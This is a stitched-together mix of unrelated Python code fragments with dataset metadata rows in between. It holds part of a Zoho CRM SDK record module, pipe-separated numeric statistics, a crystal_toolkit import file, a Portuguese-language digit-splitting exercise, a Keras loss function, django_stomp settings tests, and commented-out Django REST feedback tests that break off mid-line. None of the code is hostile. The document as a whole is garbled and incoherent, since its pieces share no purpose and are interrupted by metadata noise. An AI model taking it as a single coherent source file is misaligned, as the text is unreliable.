raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/actions/remove_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def record_count(self, module_api_name, param_instance=None):
"""
The method to record count
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/count'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.count_handler import CountHandler
except Exception:
from .count_handler import CountHandler
return handler_instance.api_call(CountHandler.__module__, 'application/json')
def get_record_using_external_id(self, external_field_value, module_api_name, param_instance=None, header_instance=None):
"""
The method to get record using external id
Parameters:
external_field_value (string) : A string representing the external_field_value
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(external_field_value, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(external_field_value)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def update_record_using_external_id(self, external_field_value, module_api_name, request, header_instance=None):
"""
The method to update record using external id
Parameters:
external_field_value (string) : A string representing the external_field_value
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(external_field_value, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(external_field_value)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_record_using_external_id(self, external_field_value, module_api_name, param_instance=None, header_instance=None):
"""
The method to delete record using external id
Parameters:
external_field_value (string) : A string representing the external_field_value
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(external_field_value, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(external_field_value)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
class GetRecordParam(object):
approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordParam')
converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordParam')
cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordParam')
uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordParam')
fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordParam')
startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordParam')
enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordParam')
territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordParam')
include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordParam')
class GetRecordHeader(object):
if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordHeader')
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordHeader')
class UpdateRecordHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordHeader')
class DeleteRecordParam(object):
wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordParam')
class DeleteRecordHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordHeader')
class GetRecordsParam(object):
approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordsParam')
converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordsParam')
cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordsParam')
ids = Param('ids', 'com.zoho.crm.api.Record.GetRecordsParam')
uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordsParam')
fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordsParam')
sort_by = Param('sort_by', 'com.zoho.crm.api.Record.GetRecordsParam')
sort_order = Param('sort_order', 'com.zoho.crm.api.Record.GetRecordsParam')
page = Param('page', 'com.zoho.crm.api.Record.GetRecordsParam')
per_page = Param('per_page', 'com.zoho.crm.api.Record.GetRecordsParam')
startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordsParam')
enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordsParam')
territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordsParam')
include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordsParam')
class GetRecordsHeader(object):
if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordsHeader')
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordsHeader')
class CreateRecordsHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.CreateRecordsHeader')
class UpdateRecordsHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordsHeader')
class DeleteRecordsParam(object):
ids = Param('ids', 'com.zoho.crm.api.Record.DeleteRecordsParam')
wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordsParam')
class DeleteRecordsHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordsHeader')
class UpsertRecordsHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpsertRecordsHeader')
class GetDeletedRecordsParam(object):
type = Param('type', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')
page = Param('page', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')
per_page = Param('per_page', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')
class GetDeletedRecordsHeader(object):
if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetDeletedRecordsHeader')
class SearchRecordsParam(object):
criteria = Param('criteria', 'com.zoho.crm.api.Record.SearchRecordsParam')
email = Param('email', 'com.zoho.crm.api.Record.SearchRecordsParam')
phone = Param('phone', 'com.zoho.crm.api.Record.SearchRecordsParam')
word = Param('word', 'com.zoho.crm.api.Record.SearchRecordsParam')
converted = Param('converted', 'com.zoho.crm.api.Record.SearchRecordsParam')
approved = Param('approved', 'com.zoho.crm.api.Record.SearchRecordsParam')
page = Param('page', 'com.zoho.crm.api.Record.SearchRecordsParam')
per_page = Param('per_page', 'com.zoho.crm.api.Record.SearchRecordsParam')
fields = Param('fields', 'com.zoho.crm.api.Record.SearchRecordsParam')
class SearchRecordsHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.SearchRecordsHeader')
class GetMassUpdateStatusParam(object):
job_id = Param('job_id', 'com.zoho.crm.api.Record.GetMassUpdateStatusParam')
class RecordCountParam(object):
criteria = Param('criteria', 'com.zoho.crm.api.Record.RecordCountParam')
email = Param('email', 'com.zoho.crm.api.Record.RecordCountParam')
phone = Param('phone', 'com.zoho.crm.api.Record.RecordCountParam')
word = Param('word', 'com.zoho.crm.api.Record.RecordCountParam')
class GetRecordUsingExternalIDParam(object):
approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
class GetRecordUsingExternalIDHeader(object):
if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDHeader')
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDHeader')
class UpdateRecordUsingExternalIDHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordUsingExternalIDHeader')
class DeleteRecordUsingExternalIDParam(object):
wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordUsingExternalIDParam')
class DeleteRecordUsingExternalIDHeader(object):
x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordUsingExternalIDHeader')
| 39.788631
| 125
| 0.785959
| 6,569
| 49,696
| 5.673771
| 0.027097
| 0.045075
| 0.065923
| 0.053715
| 0.941188
| 0.91983
| 0.885809
| 0.873923
| 0.837702
| 0.828526
| 0
| 0.001104
| 0.125342
| 49,696
| 1,248
| 126
| 39.820513
| 0.856351
| 0.160496
| 0
| 0.767347
| 0
| 0
| 0.178036
| 0.075115
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034014
| false
| 0.001361
| 0.114286
| 0
| 0.307483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09e88552ed321cc1dad79d9266caf1fb197cf131
| 494
|
py
|
Python
|
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | null | null | null |
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | 5
|
2018-10-18T19:52:12.000Z
|
2018-11-17T19:02:49.000Z
|
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | null | null | null |
from crystal_toolkit.renderables.lattice import Lattice
from crystal_toolkit.renderables.moleculegraph import MoleculeGraph
from crystal_toolkit.renderables.molecule import Molecule
from crystal_toolkit.renderables.site import Site
from crystal_toolkit.renderables.structuregraph import StructureGraph
from crystal_toolkit.renderables.structure import Structure
from crystal_toolkit.renderables.volumetric import VolumetricData
from crystal_toolkit.renderables.phasediagram import PhaseDiagram
| 54.888889
| 69
| 0.902834
| 56
| 494
| 7.821429
| 0.25
| 0.200913
| 0.328767
| 0.52968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064777
| 494
| 8
| 70
| 61.75
| 0.948052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3a19f8b3d578738a3e947cc3ce1000c43ff036b9
| 714
|
py
|
Python
|
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
num = int(input('digite um nr de 0 a 9999: '))
if num < 10:
x = str('0'+'0'+'0'+str(num))
print(f'UNIDADE: {x[3]}')
print(f'DEZENA: {x[2]}')
print(f'CENTENA: {x[1]}')
print(f'MILHAR: {x[0]}')
elif num < 100:
x = str('0' + '0' + str(num))
print(f'UNIDADE: {x[3]}')
print(f'DEZENA: {x[2]}')
print(f'CENTENA: {x[1]}')
print(f'MILHAR: {x[0]}')
elif num < 1000:
x = str('0' + str(num))
print(f'UNIDADE: {x[3]}')
print(f'DEZENA: {x[2]}')
print(f'CENTENA: {x[1]}')
print(f'MILHAR: {x[0]}')
else:
x = str(str(num))
print(f'UNIDADE: {x[3]}')
print(f'DEZENA: {x[2]}')
print(f'CENTENA: {x[1]}')
print(f'MILHAR: {x[0]}')
| 27.461538
| 47
| 0.47479
| 122
| 714
| 2.778689
| 0.221311
| 0.283186
| 0.129794
| 0.141593
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0
| 0.067164
| 0.2493
| 714
| 25
| 48
| 28.56
| 0.565299
| 0
| 0
| 0.64
| 0
| 0
| 0.383164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.64
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
3a2a22deb0c65be0eb8befe738c8b9c82b488fe0
| 134
|
py
|
Python
|
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
from keras import backend as K
def my_categorical_crossentropy(y_true, y_pred):
return K.categorical_crossentropy(y_true, y_pred)
| 33.5
| 53
| 0.820896
| 22
| 134
| 4.681818
| 0.636364
| 0.446602
| 0.466019
| 0.543689
| 0.640777
| 0.640777
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119403
| 134
| 4
| 53
| 33.5
| 0.872881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
28b517e858bfc2b67ff98723c57492a272add48e
| 2,320
|
py
|
Python
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 32
|
2019-06-10T13:24:11.000Z
|
2021-12-17T21:00:41.000Z
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 26
|
2019-12-17T12:51:00.000Z
|
2022-02-16T16:13:14.000Z
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 1
|
2021-09-11T03:55:30.000Z
|
2021-09-11T03:55:30.000Z
|
import pytest
from django_stomp.exceptions import DjangoStompImproperlyConfigured
from django_stomp.settings import eval_as_int_if_provided_value_is_not_none_otherwise_none
from django_stomp.settings import eval_settings_otherwise_raise_exception
def test_should_raise_improperly_configured_when_settings_is_not_correct_configured(mocker):
mocked_settings = mocker.patch("django_stomp.settings.django_settings")
mocked_settings.STOMP_PROCESS_MSG_WORKERS = "abc"
expected_exception_message = "STOMP_PROCESS_MSG_WORKERS is not valid!"
with pytest.raises(DjangoStompImproperlyConfigured, match=expected_exception_message):
eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
mocked_settings.STOMP_PROCESS_MSG_WORKERS = {}
with pytest.raises(DjangoStompImproperlyConfigured, match=expected_exception_message):
eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
mocked_settings.STOMP_PROCESS_MSG_WORKERS = []
with pytest.raises(DjangoStompImproperlyConfigured, match=expected_exception_message):
eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
def test_should_evaluate_settings_when_it_is_configured_as_expected(mocker):
mocked_settings = mocker.patch("django_stomp.settings.django_settings")
mocked_settings.STOMP_PROCESS_MSG_WORKERS = None
evaluated_settings = eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
assert evaluated_settings is None
mocked_settings.STOMP_PROCESS_MSG_WORKERS = 123
evaluated_settings = eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
assert evaluated_settings == 123
mocked_settings.STOMP_PROCESS_MSG_WORKERS = "3"
evaluated_settings = eval_settings_otherwise_raise_exception(
"STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
)
assert evaluated_settings == 3
| 45.490196
| 97
| 0.825
| 290
| 2,320
| 5.962069
| 0.158621
| 0.090226
| 0.112782
| 0.165414
| 0.84037
| 0.822441
| 0.765761
| 0.742626
| 0.742626
| 0.742626
| 0
| 0.003964
| 0.130172
| 2,320
| 50
| 98
| 46.4
| 0.852825
| 0
| 0
| 0.435897
| 0
| 0
| 0.115086
| 0.107328
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.051282
| false
| 0
| 0.102564
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e92cb3f0f57630c85a62b97ccbf90c6e9c220a08
| 11,579
|
py
|
Python
|
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | 6
|
2021-06-28T07:23:15.000Z
|
2021-07-22T12:59:33.000Z
|
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
# import datetime
# import json
# from django.utils import timezone
# from django.urls import reverse
# from rest_framework.test import APITestCase, APIClient
# from rest_framework import status
# from rest_framework.generics import get_object_or_404
# from lms.models.feedback_models import EventInstanceFeedback
# from lms.models.enrollment_models import UserEnrollment
# from lms.models.event_models import Event, EventInstance
# from lms.tests.helper_functions import login
# class GetEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user,self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_get_event_instance_feedback(self):
# response = self.client.get(
# reverse("event-instance-feedback-view"),
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class PostEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.validPayload = {
# "username" : self.user.username,
# "eventInstanceCode" : testEnrollment.eventInstance.eventInstanceCode,
# "eventInstanceFeedback" : "testing feedback",
# }
# def test_create_event_instance_feedback(self):
# response = self.client.post(
# reverse("event-instance-feedback-view"),
# data=json.dumps(self.validPayload),
# content_type = 'application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_event_instance_feedback_without_enrollment(self):
# self.client = APIClient()
# response = self.client.post(
# reverse("event-instance-feedback-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# class RetrieveEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.eventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_retrieve_event_instance_feedback(self):
# response = self.client.get(
# reverse('event-instance-feedback-view', kwargs={'pk':self.eventInstanceFeedback.id})
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class UpdateEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.testEventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# self.updatedPayload = {
# "username" : self.user.username,
# "eventInstanceCode" : testEnrollment.eventInstance.eventInstanceCode,
# "eventInstanceFeedback" : "updated testing feedback"
# }
# def test_update_event_instance_feedback(self):
# response = self.client.put(
# reverse('event-instance-feedback-view', kwargs={"pk":self.testEventInstanceFeedback.id}),
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class DeleteEventInstanceFeedback(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
